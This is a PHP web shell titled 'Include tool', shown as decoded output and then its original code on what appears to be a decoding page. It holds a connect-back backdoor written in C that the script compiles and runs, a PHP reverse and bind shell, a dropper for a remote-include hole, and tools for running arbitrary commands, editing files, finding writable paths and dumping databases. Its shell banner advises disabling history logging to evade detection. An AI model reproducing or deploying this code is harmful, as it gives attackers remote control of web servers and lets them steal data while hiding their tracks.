		$header .= "Content-Transfer-Encoding: 8bit

";  
		$header .= "$msg
";  
		$header .= "--$stlf
";  
		$header .= "Content-Type: $content_type; name=$attach_appear
";  
		$header .= "Content-Transfer-Encoding: base64
";  
		$header .= "Content-Disposition: attachment; filename=$attach_appear

";  
		$header .= chunk_split(base64_encode($attach));  
		$header .= "
";  
		$header .= "--$stlf--";  
		mail($to,$subject,"",$header);  
		$msgerror = "send done - show header: <br>
<pre>$header</pre> "; 
	}  
	return $msgerror; 
} 
 
###################################################################### 
# system browsing 
###################################################################### 
 
function make_switch($val){ 
	global $txt; 
	global $lang; 
	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER; 
	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; } 
	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; } 
	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> "; 
} 
function drop_syslog_warning($msg) { 
	global $syslog; 
#	if($syslog == 1) syslog(LOG_WARNING,$msg); 
} 
 
###################################################################### 
# file functions 
###################################################################### 
function copy_file($source,$dest) { 
	$dataout = ""; 
	if($source == "")  $dataout .= "enter source<br>
"; 
	if($dest != "") { 
		ini_set("user_agent","m0ins downloader"); 
		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>
"; 
		if(file_exists($dest)) $dataout .= highlight_file($dest, 1); 
	} else { 
		$dataout .= "enter destination"; 
	} 
} 
function edit_file($cont,$dest,$do) { 
	$dataout = ""; 
	global $magic_quotes_gpc; 
	if(file_exists($dest)) { 
		if($do == 1){ 
			$fh = fopen($dest, "w");		 
			if(!$fh) { 
				$dataout .= "unable to open <b>$dest</b>.
"; 
			} else { 
#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont)); 
				if($magic_quotes_gpc == 1) $cont = stripslashes($cont); 
				$write = fwrite($fh, $cont); 
				fclose($fh); 
			} 
		} 
		$dataout .= highlight_file($dest, 1); 
	} else { 
		$dataout .= "unable to open <b>$dest</b>.
"; 
	} 
	return $dataout; 
} 
function show_file($source) { 
	$dataout = ""; 
	if(file_exists($source)) { 
		$fh = fopen($source, "r"); 
		if(!$fh) { 
			$dataout .= "unable to open <b>$source</b>.
"; 
		} else { 
			$read = fread($fh, filesize($source)); 
			fclose($fh); 
			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read)); 
			$dataout .= $read; 
		} 
	} else { 
		$dataout .= "unable to open <b>$source</b>.
"; 
	} 
	return $dataout; 
} 
function snoopy($chdir){ 
	$tmpOut = ""; 
	global $is_file,$is_dir,$is_w_dir,$is_w_file; 
	$fh = opendir("$chdir"); 
	if($fh!="") { 
		while (false !== ($filename = readdir($fh)) ) { 
			$FN = $chdir."/".$filename; 
			if(@is_file($FN)) $is_file[] = $filename; 
			if(@is_dir($FN))  $is_dir[] = $filename; 
			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename; 
			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename; 
		} 
		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>"; 
		$tmpOut .= echo_files($is_file,  "all files"); 
		$tmpOut .= echo_files($is_dir,   "only dirs"); 
		$tmpOut .= echo_files($is_w_dir, "writable dirs"); 
		$tmpOut .= echo_files($is_w_file,"writable files"); 
		$tmpOut .= "</tr></table>"; 
	} else { 
		$tmpOut .= "Permission denied."; 
	} 
	closedir($fh); 
	return $tmpOut; 
} 
 
function echo_files($arr,$txt){ 
	$tmpOutMF = ""; 
	global $chdir,$MyLoc,$SREQ; 
	$tmpOutMF .= "<td valign=top>"; 
	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>"; 
	if(count($arr) > 0) { 
		foreach($arr as $key => $file) { 
			$FN = $chdir."/".$file; 
			$owner = fileowner($FN); 
			$perms = substr(sprintf("%o",fileperms($FN)),-3); 
			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; 
			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>"; 
			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>";  
			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>"; 
		} 
	} 
    $tmpOutMF .=  "</td>"; 
    return $tmpOutMF; 
} 
function print_globals($v) { 
	global $a; 
	echo "<blockquote>
"; 
	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ". 
	" echo \"<b>\$key</b>=>\$val.<br>\"; ". 
	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {". 
	" @print_globals( \$v.\"[\".\$key.\"]\" );". 
	"}}"; 
	eval($q); 
	echo "</blockquote>
"; 
} 
###################################################################### 
# connect back shell function 
###################################################################### 
 
function connect_back($tmp_dir, $compiler, $host, $port) { 
    $shell = "#include <stdio.h>
" . 
             "#include <sys/socket.h>
" . 
             "#include <netinet/in.h>
" . 
             "#include <arpa/inet.h>
" . 
             "#include <netdb.h>
" . 
             "int main(int argc, char **argv) {
" . 
             "  char *host;
" . 
             "  int port = 80;
" . 
             "  int f;
" . 
             "  int l;
" . 
             "  int sock;
" . 
             "  struct in_addr ia;
" . 
             "  struct sockaddr_in sin, from;
" . 
             "  struct hostent *he;
" . 
             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\n\n\"
" . 
             "                \"Issue \\"export TERM=xterm; exec bash -i\\"\n\"
" . 
             "                \"For More Reliable Shell.\n\"
" . 
             "                \"Issue \\"unset HISTFILE; unset SAVEHIST\\"\n\"
" . 
             "                \"For Not Getting Logged.\n(;\n\n\";
" . 
             "  printf(\"Data Cha0s Connect Back Backdoor\n\n\");
" . 
             "  if (argc < 2 || argc > 3) {
" . 
             "    printf(\"Usage: %s [Host] <port>\n\", argv[0]);
" . 
             "    return 1;
" . 
             "  }
" . 
             "  printf(\"[*] Dumping Arguments\n\");
" . 
             "  l = strlen(argv[1]);
" . 
             "  if (l <= 0) {
" . 
             "    printf(\"[-] Invalid Host Name\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  if (!(host = (char *) malloc(l))) {
" . 
             "    printf(\"[-] Unable to Allocate Memory\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  strncpy(host, argv[1], l);
" . 
             "  if (argc == 3) {
" . 
             "    port = atoi(argv[2]);
" . 
             "    if (port <= 0 || port > 65535) {
" . 
             "      printf(\"[-] Invalid Port Number\n\");
" . 
             "      return 1;
" . 
             "    }
" . 
             "  }
" . 
             "  printf(\"[*] Resolving Host Name\n\");
" . 
             "  he = gethostbyname(host);
" . 
             "  if (he) {
" . 
             "    memcpy(&ia.s_addr, he->h_addr, 4);
" . 
             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
" . 
             "    printf(\"[-] Unable to Resolve: %s\n\", host);
" . 
             "    return 1;
" . 
             "  }
" . 
             "  sin.sin_family = PF_INET;
" . 
             "  sin.sin_addr.s_addr = ia.s_addr;
" . 
             "  sin.sin_port = htons(port);
" . 
             "  printf(\"[*] Connecting...\n\");
" . 
             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
" . 
             "    printf(\"[-] Socket Error\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
" . 
             "    printf(\"[-] Unable to Connect\n\");
" . 
             "    return 1;
" . 
             "  }
" . 
             "  printf(\"[*] Spawning Shell\n\");
" . 
             "  f = fork( );
" . 
             "  if (f < 0) {
" . 
             "    printf(\"[-] Unable to Fork\n\");
" . 
             "    return 1;
" . 
             "  } else if (!f) {
" . 
             "    write(sock, msg, sizeof(msg));
" . 
             "    dup2(sock, 0);
" . 
             "    dup2(sock, 1);
" . 
             "    dup2(sock, 2);
" . 
             "    execl(\"/bin/sh\", \"shell\", NULL);
" . 
             "    close(sock);
" . 
             "    return 0;
" . 
             "  }
" . 
             "  printf(\"[*] Detached\n\n\");
" . 
             "  return 0;
" . 
             "}
"; 
    $fbname = $tmp_dir . "/cbs"; 
	$fp = fopen($fbname . ".c", "w"); 
	$write = fwrite($fp, $shell); 
	fclose($fp); 
	if(!empty($write)) { 
		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c"; 
		$execM = test_cmd_shell(); 
		if($execM > 0) { 
			$rtval = Mexec($command, $execM); 
			$command = $fbname . " " . $host . " " . $port; 
			$rtval .= Mexec($command, $execM); 
			return "<pre>" . $rtval . "</pre>"; 
		} else { 
			return "<b>ERROR! No EXEC Avilable!</b>"; 
		} 
		 
	} else { 
		return "<b>ERROR! Writing data!</b>"; 
	} 
} 
 
###################################################################### 
# drop mini inc hole 
###################################################################### 
function dropminiinc($location) { 
	$Scode = "<?php
". 
		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);
". 
		"else \$vars = \$_REQUEST;
". 
		"include(\$vars[inc]);
". 
		"?>
"; 
	$fp = fopen($location, "w"); 
	$write = fwrite($fp, $Scode); 
	if(!empty($write)) return "<b>$location</b> copied
"; 
	else return "<b>ERROR! Not copied!</b>"; 
} 
 
###################################################################### 
# db functions 
# unchanged from dans code 
###################################################################### 
function prep_rows($myresult) { 
	$dataout = "<table>
"; 
	$num_fields = mysql_num_fields($myresult); 
	$dataout .= "<tr border=1>
"; 
	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>"; 
	$dataout .= "</tr>
"; 
	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach($line as $colvalue) { 
			$dataout .= "<td>$colvalue</td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	return $dataout; 
} 
 
function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";"; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	mysql_free_result($result); 
	mysql_close($link); 
	return "Hopefully dumped!"; 
} 
 
function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = $mysql." INTO OUTFILE \"".$mydump."\";"; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	mysql_free_result($result); 
	mysql_close($link); 
	return "Hopefully dumped!"; 
} 
 
function display_query($myhost, $myuser, $mypass, $mydb, $mysql) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = $mysql; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	$dataouted = prep_rows($result); 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataouted); 
} 
 
function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) { 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	mysql_select_db($mydb); //  or return "Could not select database"; 
	$query = "SELECT * FROM ".$mytable; 
	$result = mysql_query($query); // or return "Query failed: ".mysql_error(); 
	$dataouted = prep_rows($result); 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataouted); 
} 
 
function display_tables($myhost, $myuser, $mypass, $mydb) { 
	global $MyLoc,$SREQ; 
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$result = mysql_list_tables($mydb); 
	if (!$result) { 
		return "DB Error, could not list tables"; 
	} 
	$dataout = "<table>
"; 
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach ($line as $col_value) { 
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataout); 
} 
 
function display_dbs($myhost, $myuser, $mypass) { 
	global $MyLoc,$SREQ; 
	$link = mysql_connect($myhost, $myuser, $mypass); 
	$result = mysql_list_dbs($link); 
	if (!$result) { 
		return "DB Error, could not list databases"; 
	} 
	$dataout = "<table>
"; 
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { 
		$dataout .= "<tr>
"; 
		foreach ($line as $col_value) { 
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>
"; 
		} 
	$dataout .= "</tr>
"; 
	} 
	$dataout .= "</table>
"; 
	mysql_free_result($result); 
	mysql_close($link); 
	return($dataout); 
} 
 
function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) { 
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$query = "SELECT * FROM ".$mytable; 
	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error(); 
	$dataout = "<table>
"; 
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { 
		$dataout = $dataout . "<tr>
"; 
		foreach($line as $colvalue) { 
			$dataout = $dataout . "<td>$colvalue</td>
"; 
		} 
	$dataout = $dataout . "</tr>
"; 
	} 
	$dataout = $dataout . "</table>
"; 
	return($dataout); 
} 
 
function Odisplay_tables($myhost, $myuser, $mypass) { 
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect"; 
	$result = odbc_tables($link); 
	if (!$result) { 
		return "DB Error, could not list tables"; 
	} 
	$dataout = "<table>
"; 
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) { 
		if(odbc_result($line, 4) == "TABLE") { 
			$dataout = $dataout . "<tr>
"; 
			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>
";  
		} 
		$dataout = $dataout . "</tr>
"; 
	} 
	$dataout = $dataout . "</table>
"; 
	return($dataout); 
} 
 
###################################################################### 
# Dan's Network function Wrappers 
# Initial use inside this script, need to handle the error data  
# differently to get it included in the base 64 output! 
###################################################################### 
 
function DB_NET_GET_SOCKET_PROTOCOL($prot) { 
	switch($prot) { 
		case "udp": 
			$protocol = SOL_UDP; 
			$socktype = SOCK_DGRAM; 
		break; 
		case "tcp": 
		default: 
			$protocol = SOL_TCP; 
			$socktype = SOCK_STREAM; 
		break; 
	} 
	return(array($protocol, $socktype)); 
} 
 
function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") { 
	$address = gethostbyname($hostname); 
	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot); 
	switch($prot) { 
		case "udp": 
			$protocol = SOL_UDP; 
			$socktype = SOCK_DGRAM; 
		break; 
		case "tcp": 
		default: 
			$protocol = SOL_TCP; 
			$socktype = SOCK_STREAM; 
		break; 
	} 
	$socket = socket_create(AF_INET, $socktype, $protocol); 
	if ($socket < 0) { 
		echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; 
	} 
 
	$result = socket_connect($socket, $address, $port); 
	if ($result < 0) { 
		echo "socket_connect() failed.
Reason: ($result) " . socket_strerror($result) . "
"; 
	} 
	return $socket; 
} 
 
function DB_NET_LISTEN($address, $port) { 
	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { 
		echo "socket_create() failed: reason: " . socket_strerror($sock) . "
"; 
		return(-1); 
	} 
 
	if (($ret = socket_bind($sock, $address, $port)) < 0) { 
		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "
"; 
		return(-2); 
	} 
 
	if (($ret = socket_listen($sock, 5)) < 0) { 
		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "
"; 
		return(-3); 
	} 
 
	return($sock); 
} 
 
###################################################################### 
# Dan's PHP Connect Back / Port Binding Shell! 
# Yes that right a REAL shell! 
# Now I had this idea for ages, finally coded it 6 months ago, and  
# it's never really been used. 
# Not really brain science but when there are many examples of PHP  
# sockets + proc_open it's a little harder. 
###################################################################### 
 
function DB_Shell($type, $shell, $port, $host = "0.0.0.0") { 
	if($type == "cb" && $host != "0.0.0.0") { 
		$procsock = DB_NET_CONNECT($host, $port, "tcp"); 
	} elseif ($type == "pb") { 
		$lsock = DB_NET_LISTEN($host, $port); 
		if (($procsock = socket_accept($lsock)) < 0) { 
    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "
"; 
    	} 
	} else { 
		return "Error no connection details specified!"; 
	} 
 
	set_time_limit(9000); 
	$descriptorspec = array( 
		0 => array("pipe", "r"), 
		1 => array("pipe", "w"), 
		2 => array("pipe", "w") 
	); 
	$process = proc_open($shell, $descriptorspec, $pipes); 
	if (is_resource($process)) { 
		$tmp_loop = 1; 
		do { 
			$tmp_array = array($procsock); 
			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0); 
			if ($num_changed_sockets === false) { 
				$tmp_loop = 0; 
			} else if ($num_changed_sockets > 0) { 
				foreach($tmp_array as $k => $v) { 
					if($v == $procsock) { 
						if(socket_last_error($procsock) > 0) $tmp_loop = 0; 
						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0; 
						fwrite($pipes[0], $buf); 
					} 
				} 
			} 
			$tmp_arrayS = array($pipes[1], $pipes[2]); 
			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0); 
			if ($num_changed_streams === FALSE) { 
				$tmp_loop = 0; 
			} else if ($num_changed_streams > 0) { 
				foreach($tmp_arrayS as $k => $v) { 
					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0; 
					socket_write($procsock, $buf, strlen($buf)); 
				} 
			} 
		} while($tmp_loop == 1); 
	} else { 
		return "Error executing shell " . $shell; 
	} 
} 
 
?> 

Did this file decode correctly?

Original Code

<?php
######################################################################
# we decide if we want syslogging
closelog();
######################################################################
# define variables
######################################################################

# error_reporting(E_ALL);
error_reporting(0);

# get globals even if register_globals is off
import_globals();

$safe_mode = ini_get('safe_mode');
$register_globals = ini_get('register_globals');
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
$txt['en']['on']="on";
$txt['en']['off']="off";
$txt['de']['on']="an";
$txt['de']['off']="aus";
$lang="en";

if($safe_mode == 1) $SM = $txt[$lang]['on'];
else { 
	$SM = $txt[$lang]['off'];
	# set_time_limit(9000);
}
if($register_globals == 1) $RG = $txt[$lang]['on'];
else $RG = $txt[$lang]['off'];
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
else $MQ = $txt[$lang]['off'];

# navigatable functions
$ArrFuncs = array(
	"dropinc"	=> 0,
	"filecopy"	=> 0,
	"fileedit"	=> 0,
	"showsource"	=> 0,
	"snoop"		=> 0,
	"cmdln"		=> 0,
	"connectback"	=> 0,
	"phpshell"	=> 0,
	"servicecheck"	=> 0,
	"mysqlaccess"	=> 0,
	"mail"		=> 0,
	"env"		=> 0,
	"phpenv"	=> 0,
	"phpinfo"	=> 0,
	"dumpvars"	=> 0,
	"debugscript"	=> 0,
	"syslog"	=> 0
);

# init navigation
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;



# set default values
$ArrDefaults = array(
	"filecopy_source" => "http://...",
	"filecopy_dest" => getcwd(),
	"cmdcall" => "",
	"editfile" => getcwd(),
	"editcontent" => "",
	"chdir" => ".",
	"vsource" => $SCRIPT_FILENAME,
	"mail_from" => "[email protected]",
	"mail_to" => "",
	"mail_subject" => "", 
	"mail_attach_source"  => "http://....",
	"mail_attach_appear"  => "filename...",
	"mail_content_type"   => "image/png",
	"mail_msg" => "",
	"tcpports" => "21 22 23 25 80 110",
	"timeout" => 5,
	"miniinc_loc" => getcwd() . "/miniinc.php",
	"incdbhost" => "localhost",
	"cbhost" => $_SERVER['REMOTE_ADDR'],
	"cbport" => 20202,
	"cbtempdir" => "/tmp",
	"cbcompiler" => "gcc",
	"phpshellapp" => "export TERM=xterm; bash -i",
	"phpshellhost" => "0.0.0.0",
	"phpshellport" => "20202"
);

# init defaults
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;

# define executable functions
$Mstr = array(
	0 => "No execute functions available!",
	1 => "passthru()",
	2 => "system()",
	3 => "backticks",
	4 => "proc_open()",
	5 => "exec()"
);

# clean request to avoid uri monster
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
	if($tmpCount==0) $reqdat[] = $key."=".$val;
	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
	$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
if($SREQ=="") {
	$tmp_req = array();
	$tmp_qry = explode("&", $QUERY_STRING);
	foreach($tmp_qry as $key => $val) {
		$tmp_val = explode("=", $val);
		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		$tmpCount++;
	}
	$SREQ = implode("&", $tmp_req);
}

if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];

# set some defaults to avaoid errors
$is_file   = array();
$is_dir    = array();
$is_w_dir  = array();
$is_w_file = array();
$emeth=0;
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup wether to use PHP_SELF or SCRIPT_NAME
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;

# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;

# This is a list of internal inc.inc vars that do not get displayed 
# inside the dumpvars function (poss for a debug func later?)
$DebugArr = array(
	'ARHGFDGFGASDFG',
	'safe_mode',
	'register_globals',
	'magic_quotes_gpc',
	'txt',
	'lang',
	'SM',
	'RG',
	'MQ',
	'ArrFuncs',
	'val',
	'key',
	'env',
	'phpenv',
	'phpinfo',
	'debugscript',
	'filecopy',
	'fileedit',
	'showsource',
	'snoop',
	'mail',
	'cmdln',
	'syslog',
	'servicecheck',
	'dropinc',
	'mysqlaccess',
	'ArrDefaults',
	'filecopy_source',
	'filecopy_dest',
	'cmdcall',
	'editfile',
	'editcontent',
	'chdir',
	'vsource',
	'mail_from',
	'mail_to',
	'mail_subject',
	'mail_attach_source',
	'mail_attach_appear',
	'mail_content_type',
	'mail_msg',
	'tcpports',
	'timeout',
	'miniinc_loc',
	'incdbhost',
	'Mstr',
	'SREQ',
	'reqdat',
	'tmpCount',
	'is_file',
	'is_dir',
	'is_w_dir',
	'is_w_file',
	'emeth',
	'MyLoc',
	'dumpvarsare',
	'DebugArr',
	'cbtempdir',
	'cbcompiler',
	'cbhost',
	'cbport',
	'phpshelltype',
	'phpshellapp',
	'phpshellhost',
	'phpshellport'
);


# activate syslog entry
if($syslog == 1)
{
#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
###############################################################################
#
# start include output 
#
###############################################################################
$strOutput = "";
$strOutput .= "<html><body bgcolor='#ffffff'>
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
<center>
<h2>Include tool</h2>
PHP Version: " . phpversion() . " | 
safe_mode: $SM |
register_globals: $RG | 
magic_quotes_gpc: $MQ | 
syslogging: ";
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
<br><br>
</center>
<font color='#000000'>";
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 

###############################################################################
# test cmd shell environment
###############################################################################
if($env == 1) { 
	$strOutput .= "
	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
	if($emeth==0) { 
		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
	} else {
		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
		</table>";
	}
}

###############################################################################
# test php environment
###############################################################################
if($phpenv == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
		<tr><td colspan=2>posix infos</td><tr>";
		if(function_exists('posix_uname')) {
			$posix_uname = posix_uname();
			while (list($info, $value) = each ($posix_uname)) {
				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
			}
		} else {
			$strOutput .= "posix_uname not available";
		}
		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
		else $strOutput .= "posix_getuid not available";
		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
		else $strOutput .= "posix_geteuid not available";
		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
		else $strOutput .= "posix_getgid not available";
	$strOutput .= "</table>";
}


###############################################################################
# dump variables
###############################################################################
if($dumpvars == 1) {
	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
	<tr><td>" . dd("GLOBALS") . "</td></tr>
	</table>";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($debugscript == 1) { ?>
	<table border=1><tr><td><h3>debug script</h3></td></tr>
	<tr><td>
	<? ddb("DebugArr"); ?>
	</td></tr>
	</table>
<? }
###############################################################################
# copy file
###############################################################################
if($filecopy == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
	</form>
	</table>";
} 
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= show_file($editfile);
	$strOutput .= "</textarea></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= edit_file($editcontent,$editfile,$edit);
 	$strOutput .= "</td></tr>
	</table>
	</form>";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($cmdln == 1) {
	$emeth = test_cmd_shell();
	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
	<tr><td colspan=2>";
	if($emeth < 3) {
		$strOutput .= "The output of this command will be somewhere on the page!";
		Mexec($cmdcall, $emeth);
	} else {
		$strOutput .= Mexec($cmdcall, $emeth);
	}
	$strOutput .= "</td></tr>
	</form>
	</table>";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
